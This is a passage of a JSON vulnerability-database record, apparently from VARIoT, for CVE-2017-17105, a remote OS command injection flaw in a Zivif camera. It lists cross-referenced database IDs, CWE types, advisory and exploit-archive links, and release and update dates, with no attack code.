"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"id": "VAR-201712-0828",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
}
]
},
"last_update_date": "2023-12-18T12:37:03.702000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://zivif.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.8,
"url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
},
{
"trust": 2.6,
"url": "https://twitter.com/silascutler/status/938052460328968192"
},
{
"trust": 1.9,
"url": "http://packetstormsecurity.com/files/158120/zivif-camera-2.3.4.2103-iptest.cgi-blind-remote-command-execution.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2017/dec/42"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17105"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2020060066"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://\u003ccamera"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-108094"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"date": "2017-12-13T16:50:24",
"db": "PACKETSTORM",
"id": "145386"
},
{
"date": "2017-12-19T02:29:41.550000",
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"date": "2017-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"date": "2020-06-16T00:00:00",
"db": "VULHUB",
"id": "VHN-108094"
},
{
"date": "2020-06-16T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"date": "2020-06-16T22:15:10.037000",
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"date": "2020-06-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif Web Command injection vulnerability in camera",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.6
}
}